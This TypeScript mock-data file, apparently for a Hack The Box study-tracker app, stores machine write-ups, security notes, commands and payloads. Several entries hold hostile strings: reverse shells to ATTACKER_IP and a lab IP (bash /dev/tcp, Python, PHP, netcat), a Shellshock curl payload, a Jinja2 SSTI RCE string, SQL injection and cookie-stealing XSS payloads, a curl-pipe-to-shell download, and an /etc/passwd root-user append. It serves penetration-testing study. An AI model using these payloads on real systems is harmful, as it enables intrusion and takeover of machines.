import type { Challenge, LearningEntry, Command, Payload, Note, ActivityLog, DashboardStats, Achievement } from '@/types';

export const mockChallenges: Challenge[] = [
  {
    id: 'ch-001',
    name: 'Lame',
    difficulty: 'Easy',
    category: 'Machine',
    os: 'Linux',
    platform: 'Hack The Box',
    dateCompleted: '2025-06-10T14:30:00Z',
    timeSpentMinutes: 90,
    skills: ['SMB', 'Nmap', 'Metasploit', 'Enumeration'],
    tools: ['nmap', 'enum4linux', 'smbclient', 'metasploit'],
    commands: ['nmap -sV -sC 10.10.10.3', 'enum4linux -a 10.10.10.3', 'smbclient //10.10.10.3/tmp'],
    enumeration: '## Port Scan\n```bash\nnmap -sV -sC -oN nmap/initial 10.10.10.3\n```\n\n### Open Ports\n- 21/tcp - vsftpd 2.3.4\n- 22/tcp - OpenSSH 4.7p1\n- 139/tcp - Samba smbd 3.X\n- 445/tcp - Samba smbd 3.0.20\n\n## SMB Enumeration\nUsed enum4linux to discover shares and users.',
    notes: 'Classic beginner machine. The vsftpd backdoor was a red herring for me initially. The real path was through Samba CVE-2007-2447.',
    mistakesMade: 'Forgot to check for anonymous SMB shares initially. Wasted 20 minutes trying the vsftpd backdoor.',
    lessonsLearned: 'Always enumerate SMB thoroughly before trying exploits. Check for known CVEs on all service versions.',
    alternativeApproaches: 'Could have used manual exploitation instead of Metasploit. The Samba username map script vulnerability can be exploited with a simple Python script.',
    externalUrl: 'https://app.hackthebox.com/machines/Lame',
    tags: ['smb', 'cve', 'metasploit', 'beginner'],
    isFavorite: true,
    reviewStatus: 'Mastered',
    screenshots: [],
    relatedChallenges: ['ch-002'],
    createdAt: '2025-06-10T15:00:00Z',
    updatedAt: '2025-06-10T15:00:00Z',
  },
  {
    id: 'ch-002',
    name: 'Blue',
    difficulty: 'Easy',
    category: 'Machine',
    os: 'Windows',
    platform: 'Hack The Box',
    dateCompleted: '2025-06-12T10:00:00Z',
    timeSpentMinutes: 45,
    skills: ['SMB', 'Nmap', 'EternalBlue', 'Windows Exploitation'],
    tools: ['nmap', 'metasploit', 'msfvenom'],
    commands: ['nmap -sV --script=smb-vuln* 10.10.10.40', 'use exploit/windows/smb/ms17_010_eternalblue'],
    enumeration: '## Port Scan\n```bash\nnmap -sV --script=smb-vuln* 10.10.10.40\n```\n\n### Results\n- 135/tcp - msrpc\n- 139/tcp - netbios-ssn\n- 445/tcp - microsoft-ds\n- Vulnerable to MS17-010 (EternalBlue)',
    notes: 'Straightforward EternalBlue exploitation. Good machine for understanding Windows SMB vulnerabilities.',
    mistakesMade: 'Initially used wrong payload architecture (x86 vs x64).',
    lessonsLearned: 'Always check target architecture before generating payloads. MS17-010 is a critical vulnerability to understand.',
    alternativeApproaches: 'AutoBlue script provides a non-Metasploit approach.',
    externalUrl: 'https://app.hackthebox.com/machines/Blue',
    tags: ['eternalblue', 'smb', 'windows', 'cve', 'ms17-010'],
    isFavorite: false,
    reviewStatus: 'Reviewed',
    screenshots: [],
    relatedChallenges: ['ch-001'],
    createdAt: '2025-06-12T11:00:00Z',
    updatedAt: '2025-06-12T11:00:00Z',
  },
  {
    id: 'ch-003',
    name: 'Bashed',
    difficulty: 'Easy',
    category: 'Machine',
    os: 'Linux',
    platform: 'Hack The Box',
    dateCompleted: '2025-06-15T16:00:00Z',
    timeSpentMinutes: 60,
    skills: ['Web Enumeration', 'Reverse Shell', 'Privilege Escalation', 'Cron Jobs'],
    tools: ['gobuster', 'nmap', 'python', 'linpeas'],
    commands: ['gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt', 'python -c "import socket,subprocess,os;..."'],
    enumeration: '## Web Enumeration\nFound phpbash at `/dev/phpbash.php` using gobuster.\n\n## Privilege Escalation\nCron job running as root executing scripts in `/scripts/`.',
    notes: 'Good intro to web shell discovery and cron-based privilege escalation.',
    mistakesMade: 'Took too long to find the web shell — should have used a bigger wordlist.',
    lessonsLearned: 'Always check /dev, /backup, /test directories. Cron jobs are a common privesc vector.',
    alternativeApproaches: 'Could pivot through the scriptmanager user differently.',
    externalUrl: 'https://app.hackthebox.com/machines/Bashed',
    tags: ['web', 'php', 'cron', 'privesc', 'enumeration'],
    isFavorite: false,
    reviewStatus: 'Reviewed',
    screenshots: [],
    relatedChallenges: [],
    createdAt: '2025-06-15T17:00:00Z',
    updatedAt: '2025-06-15T17:00:00Z',
  },
  {
    id: 'ch-004',
    name: 'Optimum',
    difficulty: 'Easy',
    category: 'Machine',
    os: 'Windows',
    platform: 'Hack The Box',
    dateCompleted: '2025-06-18T09:00:00Z',
    timeSpentMinutes: 75,
    skills: ['Web Exploitation', 'HFS', 'Windows Privilege Escalation', 'Sherlock'],
    tools: ['nmap', 'searchsploit', 'powershell', 'winpeas'],
    commands: ['searchsploit hfs 2.3', 'powershell IEX(New-Object Net.WebClient).DownloadString(...)'],
    enumeration: '## Initial Scan\nOnly port 80 open running HFS 2.3.\n\n## Exploitation\nUsed CVE-2014-6287 for RCE on HFS.\n\n## Privesc\nUsed MS16-032 for privilege escalation.',
    notes: 'Simple machine with straightforward exploitation chain.',
    mistakesMade: 'Forgot to try searchsploit before manually looking for exploits.',
    lessonsLearned: 'searchsploit should be one of the first tools used. Windows kernel exploits are powerful for privesc.',
    alternativeApproaches: 'Manual exploitation of HFS without Metasploit is possible.',
    externalUrl: 'https://app.hackthebox.com/machines/Optimum',
    tags: ['hfs', 'windows', 'cve', 'kernel-exploit'],
    isFavorite: false,
    reviewStatus: 'In Progress',
    screenshots: [],
    relatedChallenges: ['ch-002'],
    createdAt: '2025-06-18T10:00:00Z',
    updatedAt: '2025-06-18T10:00:00Z',
  },
  {
    id: 'ch-005',
    name: 'Shocker',
    difficulty: 'Easy',
    category: 'Machine',
    os: 'Linux',
    platform: 'Hack The Box',
    dateCompleted: '2025-06-20T14:00:00Z',
    timeSpentMinutes: 55,
    skills: ['Shellshock', 'CGI', 'Nmap', 'GTFOBins'],
    tools: ['nmap', 'gobuster', 'curl', 'perl'],
    commands: ['gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x sh,pl,cgi', 'curl -A "() { :;}; /bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" http://10.10.10.56/cgi-bin/user.sh'],
    enumeration: '## CGI Discovery\nFound `/cgi-bin/user.sh` via gobuster with extensions.\n\n## Shellshock\nExploited CVE-2014-6271 via User-Agent header.',
    notes: 'Great machine for learning Shellshock. The key was enumerating cgi-bin with extensions.',
    mistakesMade: 'Did not add trailing slash to /cgi-bin/ initially, missing the directory.',
    lessonsLearned: 'Always try directory enumeration with trailing slashes. Shellshock is still relevant.',
    alternativeApproaches: 'Nmap has a shellshock detection script: http-shellshock.',
    externalUrl: 'https://app.hackthebox.com/machines/Shocker',
    tags: ['shellshock', 'cgi', 'bash', 'cve', 'gtfobins'],
    isFavorite: true,
    reviewStatus: 'Mastered',
    screenshots: [],
    relatedChallenges: [],
    createdAt: '2025-06-20T15:00:00Z',
    updatedAt: '2025-06-20T15:00:00Z',
  },
];

export const mockLearningEntries: LearningEntry[] = [
  {
    id: 'le-001',
    title: 'SQL Injection',
    category: 'Web Security',
    difficulty: 'Medium',
    summary: 'SQL Injection is a code injection technique that exploits vulnerabilities in web applications that use SQL databases.',
    detailedNotes: '# SQL Injection\n\n## Types\n\n### Error-based SQLi\nExtracts data through error messages.\n\n### Blind SQLi\n- **Boolean-based**: Infers data from true/false responses\n- **Time-based**: Uses time delays (SLEEP, BENCHMARK)\n\n### Union-based SQLi\nUses UNION SELECT to combine results.\n\n### Stacked Queries\nExecutes multiple queries separated by semicolons.\n\n## Detection\n```sql\n\' OR 1=1--\n" OR 1=1--\n\' OR \'1\'=\'1\n```\n\n## Prevention\n- Parameterized queries\n- Input validation\n- WAF rules\n- Least privilege database accounts',
    conceptExplanation: 'SQL Injection occurs when user input is concatenated directly into SQL queries without proper sanitization or parameterization.',
    examples: '```sql\n-- Basic authentication bypass\nadmin\' OR 1=1--\n\n-- Union-based extraction\n\' UNION SELECT username, password FROM users--\n\n-- Time-based blind\n\' OR IF(1=1, SLEEP(5), 0)--\n```',
    realWorldApplications: 'SQL injection has been responsible for major breaches including Yahoo, LinkedIn, and Sony. OWASP consistently ranks it as a top vulnerability.',
    commands: ['sqlmap', 'burpsuite'],
    payloads: ["' OR 1=1--", "' UNION SELECT NULL,NULL--", "' AND SLEEP(5)--"],
    relatedChallenges: [],
    relatedCVEs: ['CVE-2019-0211', 'CVE-2018-15133'],
    owaspCategory: 'A03:2021 - Injection',
    mitreAttackTechniques: ['T1190 - Exploit Public-Facing Application'],
    confidenceLevel: 4,
    needsRevision: false,
    flashcards: [
      { id: 'fc-001', question: 'What are the three main types of SQL injection?', answer: 'Error-based, Blind (Boolean and Time-based), and Union-based', ease: 2.5 },
      { id: 'fc-002', question: 'How do you prevent SQL injection?', answer: 'Parameterized queries, input validation, WAF, least privilege DB accounts', ease: 2.5 },
    ],
    resources: [
      { id: 'r-001', title: 'OWASP SQL Injection', url: 'https://owasp.org/www-community/attacks/SQL_Injection', type: 'documentation' },
      { id: 'r-002', title: 'PortSwigger SQL Injection', url: 'https://portswigger.net/web-security/sql-injection', type: 'article' },
    ],
    tags: ['sqli', 'injection', 'web', 'owasp'],
    createdAt: '2025-06-01T10:00:00Z',
    updatedAt: '2025-06-01T10:00:00Z',
  },
  {
    id: 'le-002',
    title: 'Cross-Site Scripting (XSS)',
    category: 'Web Security',
    difficulty: 'Medium',
    summary: 'XSS allows attackers to inject client-side scripts into web pages viewed by other users.',
    detailedNotes: '# Cross-Site Scripting (XSS)\n\n## Types\n\n### Reflected XSS\nPayload is reflected in the server response.\n\n### Stored XSS\nPayload is permanently stored on the target server.\n\n### DOM-based XSS\nPayload is executed in the browser DOM.\n\n## Impact\n- Session hijacking\n- Cookie theft\n- Keylogging\n- Phishing\n- Malware distribution',
    conceptExplanation: 'XSS exploits the trust a user has in a website by injecting malicious scripts that execute in the context of the trusted site.',
    examples: '```html\n<script>alert(1)</script>\n<img src=x onerror=alert(1)>\n<svg onload=alert(1)>\n```',
    realWorldApplications: 'XSS has been found in major platforms like Twitter, Facebook, and Google. It remains one of the most common web vulnerabilities.',
    commands: ['burpsuite', 'dalfox'],
    payloads: ['<script>alert(1)</script>', '<img src=x onerror=alert(1)>', '"><svg onload=alert(1)>'],
    relatedChallenges: [],
    relatedCVEs: [],
    owaspCategory: 'A03:2021 - Injection',
    mitreAttackTechniques: ['T1059.007 - JavaScript'],
    confidenceLevel: 3,
    needsRevision: true,
    flashcards: [
      { id: 'fc-003', question: 'What are the three types of XSS?', answer: 'Reflected, Stored, and DOM-based', ease: 2.5 },
    ],
    resources: [
      { id: 'r-003', title: 'PortSwigger XSS', url: 'https://portswigger.net/web-security/cross-site-scripting', type: 'article' },
    ],
    tags: ['xss', 'injection', 'web', 'owasp', 'javascript'],
    createdAt: '2025-06-05T10:00:00Z',
    updatedAt: '2025-06-05T10:00:00Z',
  },
  {
    id: 'le-003',
    title: 'Linux Privilege Escalation',
    category: 'Privilege Escalation',
    difficulty: 'Hard',
    summary: 'Techniques for escalating privileges from a low-privilege user to root on Linux systems.',
    detailedNotes: '# Linux Privilege Escalation\n\n## Enumeration\n- `id`, `whoami`\n- `uname -a`\n- `cat /etc/passwd`\n- `sudo -l`\n\n## Common Vectors\n\n### SUID Binaries\n```bash\nfind / -perm -4000 -type f 2>/dev/null\n```\n\n### Sudo Misconfigurations\n```bash\nsudo -l\n```\n\n### Cron Jobs\n```bash\ncat /etc/crontab\nls -la /etc/cron*\n```\n\n### Kernel Exploits\nCheck kernel version and search for known exploits.\n\n### Writable /etc/passwd\nAdd a new root user.\n\n### Capabilities\n```bash\ngetcap -r / 2>/dev/null\n```',
    conceptExplanation: 'Privilege escalation exploits misconfigurations or vulnerabilities to gain higher access than initially granted.',
    examples: '```bash\n# SUID exploitation\nfind / -perm -4000 2>/dev/null\n\n# Writable /etc/passwd\nopenssl passwd -1 newpassword\necho "newroot:hash:0:0:root:/root:/bin/bash" >> /etc/passwd\n```',
    realWorldApplications: 'Privilege escalation is a critical phase in penetration testing and is essential for completing most HTB machines.',
    commands: ['linpeas', 'linenum', 'pspy', 'find', 'sudo'],
    payloads: [],
    relatedChallenges: ['ch-003'],
    relatedCVEs: ['CVE-2021-4034', 'CVE-2021-3156'],
    owaspCategory: '',
    mitreAttackTechniques: ['T1548 - Abuse Elevation Control Mechanism'],
    confidenceLevel: 3,
    needsRevision: true,
    flashcards: [
      { id: 'fc-004', question: 'Name 5 common Linux privesc vectors', answer: 'SUID binaries, sudo misconfig, cron jobs, kernel exploits, writable /etc/passwd', ease: 2.5 },
    ],
    resources: [
      { id: 'r-004', title: 'GTFOBins', url: 'https://gtfobins.github.io/', type: 'tool' },
      { id: 'r-005', title: 'LinPEAS', url: 'https://github.com/carlospolop/PEASS-ng', type: 'tool' },
    ],
    tags: ['privesc', 'linux', 'suid', 'sudo', 'cron', 'kernel'],
    createdAt: '2025-06-08T10:00:00Z',
    updatedAt: '2025-06-08T10:00:00Z',
  },
];

export const mockCommands: Command[] = [
  {
    id: 'cmd-001',
    name: 'nmap',
    description: 'Network exploration tool and security scanner. Used for host discovery, port scanning, version detection, and OS detection.',
    examples: '```bash\n# Basic scan\nnmap 10.10.10.1\n\n# Service version detection\nnmap -sV -sC 10.10.10.1\n\n# Full TCP scan\nnmap -p- 10.10.10.1\n\n# UDP scan\nnmap -sU --top-ports 100 10.10.10.1\n\n# Aggressive scan\nnmap -A 10.10.10.1\n\n# Output to file\nnmap -sV -sC -oN scan.txt 10.10.10.1\n```',
    options: '-sV (version detection), -sC (default scripts), -p- (all ports), -sU (UDP), -A (aggressive), -oN (output normal), --script (NSE scripts)',
    usedInChallenges: ['ch-001', 'ch-002', 'ch-003', 'ch-004', 'ch-005'],
    usedInLearning: [],
    tags: ['scanning', 'enumeration', 'network'],
    frequencyUsed: 42,
    createdAt: '2025-06-01T10:00:00Z',
  },
  {
    id: 'cmd-002',
    name: 'gobuster',
    description: 'Directory and file brute-forcing tool. Used for discovering hidden directories and files on web servers.',
    examples: '```bash\n# Directory brute-force\ngobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt\n\n# With extensions\ngobuster dir -u http://target -w wordlist.txt -x php,html,txt\n\n# VHOST enumeration\ngobuster vhost -u http://target -w subdomains.txt\n\n# DNS subdomain\ngobuster dns -d target.com -w subdomains.txt\n```',
    options: 'dir (directory mode), dns (DNS mode), vhost (virtual host mode), -u (URL), -w (wordlist), -x (extensions), -t (threads)',
    usedInChallenges: ['ch-003', 'ch-005'],
    usedInLearning: [],
    tags: ['web', 'enumeration', 'directory'],
    frequencyUsed: 28,
    createdAt: '2025-06-01T10:00:00Z',
  },
  {
    id: 'cmd-003',
    name: 'sqlmap',
    description: 'Automatic SQL injection and database takeover tool.',
    examples: '```bash\n# Basic test\nsqlmap -u "http://target/page?id=1"\n\n# With cookie\nsqlmap -u "http://target/page?id=1" --cookie="PHPSESSID=abc123"\n\n# Dump database\nsqlmap -u "http://target/page?id=1" --dump\n\n# OS shell\nsqlmap -u "http://target/page?id=1" --os-shell\n```',
    options: '-u (URL), --data (POST data), --cookie, --dump, --dbs, --tables, --columns, --os-shell, --level, --risk',
    usedInChallenges: [],
    usedInLearning: ['le-001'],
    tags: ['sqli', 'web', 'injection', 'database'],
    frequencyUsed: 15,
    createdAt: '2025-06-01T10:00:00Z',
  },
  {
    id: 'cmd-004',
    name: 'linpeas',
    description: 'Linux Privilege Escalation Awesome Script. Automated enumeration tool for finding privilege escalation vectors.',
    examples: '```bash\n# Download and run\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n\n# Run with output\n./linpeas.sh | tee linpeas_output.txt\n\n# Run specific checks\n./linpeas.sh -a\n```',
    options: '-a (all checks), -s (superfast), -P (password), -o (only), -d (debug)',
    usedInChallenges: ['ch-003'],
    usedInLearning: ['le-003'],
    tags: ['privesc', 'linux', 'enumeration', 'automation'],
    frequencyUsed: 22,
    createdAt: '2025-06-01T10:00:00Z',
  },
];

export const mockPayloads: Payload[] = [
  {
    id: 'pl-001',
    name: "Basic Auth Bypass",
    category: 'SQLi',
    content: "' OR 1=1--",
    explanation: 'Classic SQL injection payload that bypasses authentication by making the WHERE clause always true.',
    whenToUse: 'Login forms, search fields, or any input that is directly concatenated into a SQL query.',
    risks: 'May cause unintended data exposure or modification. Use with caution in production environments.',
    references: 'https://owasp.org/www-community/attacks/SQL_Injection',
    relatedChallenges: [],
    tags: ['sqli', 'auth-bypass', 'basic'],
    createdAt: '2025-06-01T10:00:00Z',
  },
  {
    id: 'pl-002',
    name: 'Reflected XSS Alert',
    category: 'XSS',
    content: '<script>alert(document.cookie)</script>',
    explanation: 'Basic XSS payload that displays cookies in an alert box. Used for proof of concept.',
    whenToUse: 'Testing for reflected XSS in URL parameters, search fields, or form inputs.',
    risks: 'Can be used to steal session cookies, perform actions on behalf of users.',
    references: 'https://portswigger.net/web-security/cross-site-scripting',
    relatedChallenges: [],
    tags: ['xss', 'reflected', 'cookie-theft'],
    createdAt: '2025-06-01T10:00:00Z',
  },
  {
    id: 'pl-003',
    name: 'Python Reverse Shell',
    category: 'Command Injection',
    content: 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'',
    explanation: 'Python-based reverse shell that connects back to the attacker and spawns an interactive shell.',
    whenToUse: 'When you have command execution on a target with Python installed.',
    risks: 'Creates an unencrypted connection. Can be detected by IDS/IPS.',
    references: 'https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet',
    relatedChallenges: ['ch-003'],
    tags: ['reverse-shell', 'python', 'rce'],
    createdAt: '2025-06-01T10:00:00Z',
  },
  {
    id: 'pl-004',
    name: 'SSTI Jinja2 RCE',
    category: 'SSTI',
    content: '{{config.__class__.__init__.__globals__[\'os\'].popen(\'id\').read()}}',
    explanation: 'Server-Side Template Injection payload for Jinja2 (Python Flask). Achieves Remote Code Execution.',
    whenToUse: 'When user input is rendered inside a Jinja2 template without proper sanitization.',
    risks: 'Full RCE on the server. Extremely dangerous.',
    references: 'https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection',
    relatedChallenges: [],
    tags: ['ssti', 'jinja2', 'flask', 'python', 'rce'],
    createdAt: '2025-06-01T10:00:00Z',
  },
];

export const mockNotes: Note[] = [
  {
    id: 'note-001',
    title: 'HTB Methodology',
    content: '# My HTB Methodology\n\n## Phase 1: Reconnaissance\n1. `nmap -sV -sC -oN initial target`\n2. `nmap -p- -oN full target`\n3. Check for UDP ports\n\n## Phase 2: Enumeration\n- Web: gobuster, nikto, ffuf\n- SMB: enum4linux, smbclient\n- DNS: dig, nslookup\n\n## Phase 3: Exploitation\n- Search for known CVEs\n- Try default credentials\n- Check for misconfigurations\n\n## Phase 4: Post-Exploitation\n- Grab user.txt and root.txt\n- Run linpeas/winpeas\n- Check for privilege escalation vectors\n\n## Phase 5: Documentation\n- Screenshot everything\n- Document all commands\n- Note mistakes and lessons learned',
    folder: 'Methodology',
    tags: ['methodology', 'htb', 'workflow'],
    isPinned: true,
    createdAt: '2025-06-01T10:00:00Z',
    updatedAt: '2025-06-20T10:00:00Z',
  },
  {
    id: 'note-002',
    title: 'Reverse Shell Cheatsheet',
    content: '# Reverse Shell Cheatsheet\n\n## Bash\n```bash\nbash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\n```\n\n## Python\n```python\npython3 -c \'import socket,subprocess,os;s=socket.socket();s.connect(("IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'\n```\n\n## PHP\n```php\nphp -r \'$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");\'\n```\n\n## Netcat\n```bash\nnc -e /bin/sh ATTACKER_IP PORT\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f\n```',
    folder: 'Cheatsheets',
    tags: ['reverse-shell', 'cheatsheet', 'exploitation'],
    isPinned: true,
    createdAt: '2025-06-02T10:00:00Z',
    updatedAt: '2025-06-15T10:00:00Z',
  },
];

export const mockActivities: ActivityLog[] = [
  { id: 'act-001', activityType: 'challenge_completed', entityType: 'challenge', entityId: 'ch-005', description: 'Completed Shocker (Easy)', durationMinutes: 55, timestamp: '2025-06-20T15:00:00Z' },
  { id: 'act-002', activityType: 'learning_added', entityType: 'learning', entityId: 'le-003', description: 'Added Linux Privilege Escalation notes', durationMinutes: 45, timestamp: '2025-06-19T10:00:00Z' },
  { id: 'act-003', activityType: 'challenge_completed', entityType: 'challenge', entityId: 'ch-004', description: 'Completed Optimum (Easy)', durationMinutes: 75, timestamp: '2025-06-18T10:00:00Z' },
  { id: 'act-004', activityType: 'note_created', entityType: 'note', entityId: 'note-002', description: 'Created Reverse Shell Cheatsheet', timestamp: '2025-06-17T10:00:00Z' },
  { id: 'act-005', activityType: 'challenge_completed', entityType: 'challenge', entityId: 'ch-003', description: 'Completed Bashed (Easy)', durationMinutes: 60, timestamp: '2025-06-15T17:00:00Z' },
  { id: 'act-006', activityType: 'command_added', entityType: 'command', entityId: 'cmd-004', description: 'Added linpeas to Command Vault', timestamp: '2025-06-14T10:00:00Z' },
  { id: 'act-007', activityType: 'challenge_completed', entityType: 'challenge', entityId: 'ch-002', description: 'Completed Blue (Easy)', durationMinutes: 45, timestamp: '2025-06-12T11:00:00Z' },
  { id: 'act-008', activityType: 'challenge_completed', entityType: 'challenge', entityId: 'ch-001', description: 'Completed Lame (Easy)', durationMinutes: 90, timestamp: '2025-06-10T15:00:00Z' },
  { id: 'act-009', activityType: 'learning_added', entityType: 'learning', entityId: 'le-002', description: 'Added XSS learning notes', durationMinutes: 30, timestamp: '2025-06-05T10:00:00Z' },
  { id: 'act-010', activityType: 'learning_added', entityType: 'learning', entityId: 'le-001', description: 'Added SQL Injection learning notes', durationMinutes: 60, timestamp: '2025-06-01T10:00:00Z' },
];

export const mockDashboardStats: DashboardStats = {
  currentStreak: 7,
  hoursLearned: 48,
  machinesCompleted: 5,
  academyModules: 3,
  sherlocksCompleted: 0,
  challengesCompleted: 5,
  activeGoals: 3,
  knowledgeScore: 72,
  totalCommands: 4,
  totalPayloads: 4,
  totalNotes: 2,
};

export const mockAchievements: Achievement[] = [
  { id: 'ach-001', badgeType: 'first_machine', title: 'First Blood', description: 'Complete your first machine', icon: '🩸', requirement: 1, current: 5, isUnlocked: true, unlockedAt: '2025-06-10T15:00:00Z' },
  { id: 'ach-002', badgeType: 'machines_10', title: 'Machine Hunter', description: 'Complete 10 machines', icon: '🎯', requirement: 10, current: 5, isUnlocked: false },
  { id: 'ach-003', badgeType: 'machines_50', title: 'Machine Slayer', description: 'Complete 50 machines', icon: '⚔️', requirement: 50, current: 5, isUnlocked: false },
  { id: 'ach-004', badgeType: 'machines_100', title: 'Machine God', description: 'Complete 100 machines', icon: '👑', requirement: 100, current: 5, isUnlocked: false },
  { id: 'ach-005', badgeType: 'linux_master', title: 'Linux Master', description: 'Complete 20 Linux machines', icon: '🐧', requirement: 20, current: 3, isUnlocked: false },
  { id: 'ach-006', badgeType: 'windows_explorer', title: 'Windows Explorer', description: 'Complete 20 Windows machines', icon: '🪟', requirement: 20, current: 2, isUnlocked: false },
  { id: 'ach-007', badgeType: 'web_wizard', title: 'Web Wizard', description: 'Complete 15 web challenges', icon: '🌐', requirement: 15, current: 2, isUnlocked: false },
  { id: 'ach-008', badgeType: 'enum_expert', title: 'Enumeration Expert', description: 'Use 50 unique enumeration commands', icon: '🔍', requirement: 50, current: 12, isUnlocked: false },
  { id: 'ach-009', badgeType: 'sqli_hunter', title: 'SQLi Hunter', description: 'Complete 10 SQLi-related challenges', icon: '💉', requirement: 10, current: 1, isUnlocked: false },
  { id: 'ach-010', badgeType: 'streak_7', title: 'Week Warrior', description: 'Maintain a 7-day learning streak', icon: '🔥', requirement: 7, current: 7, isUnlocked: true, unlockedAt: '2025-06-20T00:00:00Z' },
  { id: 'ach-011', badgeType: 'streak_30', title: 'Monthly Master', description: 'Maintain a 30-day learning streak', icon: '💎', requirement: 30, current: 7, isUnlocked: false },
  { id: 'ach-012', badgeType: 'knowledge_base', title: 'Knowledge Keeper', description: 'Create 25 learning entries', icon: '📚', requirement: 25, current: 3, isUnlocked: false },
];

// Contribution graph data (last 365 days)
export function generateContributionData(): { date: string; count: number }[] {
  const data: { date: string; count: number }[] = [];
  const now = new Date();
  for (let i = 364; i >= 0; i--) {
    const date = new Date(now);
    date.setDate(date.getDate() - i);
    const dateStr = date.toISOString().split('T')[0];
    // Generate some realistic-looking data
    const random = Math.random();
    let count = 0;
    if (i < 30) {
      // Recent month - more active
      if (random > 0.3) count = Math.floor(Math.random() * 5) + 1;
    } else if (i < 90) {
      // Last quarter - moderate
      if (random > 0.5) count = Math.floor(Math.random() * 4) + 1;
    } else {
      // Older - sparse
      if (random > 0.7) count = Math.floor(Math.random() * 3) + 1;
    }
    data.push({ date: dateStr, count });
  }
  return data;
}
